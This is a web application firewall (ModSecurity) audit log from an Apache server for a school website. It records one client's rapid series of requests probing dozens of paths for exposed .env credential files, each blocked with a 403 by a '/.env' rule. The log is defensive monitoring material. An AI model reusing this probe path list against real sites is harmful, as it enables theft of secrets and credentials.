Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eda176d-Z-- --dc17111c-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-UAAAAIw 103.236.140.4 38426 103.236.140.4 8181 --dc17111c-B-- GET /env/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --dc17111c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc17111c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906552154 698 (- - -) Stopwatch2: 1745151906552154 698; combined=280, p1=245, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc17111c-Z-- --82207668-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6wAAAMQ 103.236.140.4 38428 103.236.140.4 8181 --82207668-B-- GET /shared/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --82207668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82207668-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906621887 690 (- - -) Stopwatch2: 1745151906621887 690; combined=270, p1=242, p2=0, p3=0, p4=0, p5=27, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82207668-Z-- --4b153a18-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr7AAAAMw 103.236.140.4 38430 103.236.140.4 8181 --4b153a18-B-- GET /fedex/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4b153a18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b153a18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906692153 688 (- - -) Stopwatch2: 1745151906692153 688; combined=287, p1=260, p2=0, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b153a18-Z-- --5cd01123-A-- [20/Apr/2025:19:25:06 +0700] aATnolu16wJWB6g0mU8NsQAAAAg 103.236.140.4 38436 103.236.140.4 8181 --5cd01123-B-- GET /.env.dist HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5cd01123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cd01123-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906762181 687 (- - -) Stopwatch2: 1745151906762181 687; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cd01123-Z-- --105e3d14-A-- [20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3gAAAEI 103.236.140.4 38438 103.236.140.4 8181 --105e3d14-B-- GET /rest/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --105e3d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --105e3d14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906832873 812 (- - -) Stopwatch2: 1745151906832873 812; combined=298, p1=259, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --105e3d14-Z-- --78cea856-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr7QAAAMs 103.236.140.4 38440 103.236.140.4 8181 --78cea856-B-- GET /.env.project HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --78cea856-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78cea856-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906903674 702 (- - -) Stopwatch2: 1745151906903674 702; combined=259, p1=220, p2=0, p3=0, p4=0, p5=39, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78cea856-Z-- --03108a13-A-- [20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3wAAAEo 103.236.140.4 38442 103.236.140.4 8181 --03108a13-B-- GET /product/.env.staging HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --03108a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03108a13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906973489 567 (- - -) Stopwatch2: 1745151906973489 567; combined=216, p1=189, p2=0, p3=0, p4=0, p5=27, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03108a13-Z-- --cca53d76-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4AAAAFM 103.236.140.4 38444 103.236.140.4 8181 --cca53d76-B-- GET /_static/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cca53d76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cca53d76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907044452 652 (- - -) Stopwatch2: 1745151907044452 652; combined=254, p1=223, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cca53d76-Z-- --d8eb3529-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4QAAAEU 103.236.140.4 38446 103.236.140.4 8181 --d8eb3529-B-- GET /.env.www HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d8eb3529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8eb3529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907114685 674 (- - -) Stopwatch2: 1745151907114685 674; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8eb3529-Z-- --5f923d08-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4gAAAFY 103.236.140.4 38448 103.236.140.4 8181 --5f923d08-B-- GET /.env_1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5f923d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f923d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907184353 651 (- - -) Stopwatch2: 1745151907184353 651; combined=247, p1=214, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f923d08-Z-- --47d2ab52-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4wAAAEA 103.236.140.4 38450 103.236.140.4 8181 --47d2ab52-B-- GET /admin-app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --47d2ab52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47d2ab52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907255287 651 (- - -) Stopwatch2: 1745151907255287 651; combined=247, p1=217, p2=0, p3=0, p4=0, p5=30, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47d2ab52-Z-- --5c8e8c6e-A-- [20/Apr/2025:19:25:07 +0700] aATno0AzeWrUIk0gvAsr7gAAANU 103.236.140.4 38452 103.236.140.4 8181 --5c8e8c6e-B-- GET /docs/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5c8e8c6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c8e8c6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907325460 681 (- - -) Stopwatch2: 1745151907325460 681; combined=252, p1=215, p2=0, p3=0, p4=0, p5=37, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c8e8c6e-Z-- --c9d55b05-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ5AAAAFg 103.236.140.4 38454 103.236.140.4 8181 --c9d55b05-B-- GET /.env_sample HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --c9d55b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9d55b05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907395843 707 (- - -) Stopwatch2: 1745151907395843 707; combined=248, p1=215, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9d55b05-Z-- --e659ec3f-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ5QAAAFQ 103.236.140.4 38456 103.236.140.4 8181 --e659ec3f-B-- GET /.env.backup/.env.dev HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --e659ec3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e659ec3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907467234 670 (- - -) Stopwatch2: 1745151907467234 670; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e659ec3f-Z-- --55e02b39-A-- [20/Apr/2025:19:25:07 +0700] aATno1u16wJWB6g0mU8NsgAAABM 103.236.140.4 38464 103.236.140.4 8181 --55e02b39-B-- GET /client/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --55e02b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e02b39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907853336 793 (- - -) Stopwatch2: 1745151907853336 793; combined=329, p1=296, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55e02b39-Z-- --8b948670-A-- [20/Apr/2025:19:25:07 +0700] aATno1u16wJWB6g0mU8NswAAAAI 103.236.140.4 38466 103.236.140.4 8181 --8b948670-B-- GET /private/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8b948670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b948670-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907929782 743 (- - -) Stopwatch2: 1745151907929782 743; combined=254, p1=216, p2=0, p3=0, p4=0, p5=38, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b948670-Z-- --f6e6d06b-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6AAAAEg 103.236.140.4 38470 103.236.140.4 8181 --f6e6d06b-B-- GET /media/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --f6e6d06b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6e6d06b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908297252 719 (- - -) Stopwatch2: 1745151908297252 719; combined=298, p1=267, p2=0, p3=0, p4=0, p5=31, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6e6d06b-Z-- --3d01e64e-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6QAAAE4 103.236.140.4 38472 103.236.140.4 8181 --3d01e64e-B-- GET /.env.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3d01e64e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d01e64e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908367069 688 (- - -) Stopwatch2: 1745151908367069 688; combined=284, p1=252, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d01e64e-Z-- --031b0047-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtQAAABI 103.236.140.4 38474 103.236.140.4 8181 --031b0047-B-- GET /enviroments/.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --031b0047-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --031b0047-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908437372 707 (- - -) Stopwatch2: 1745151908437372 707; combined=257, p1=219, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
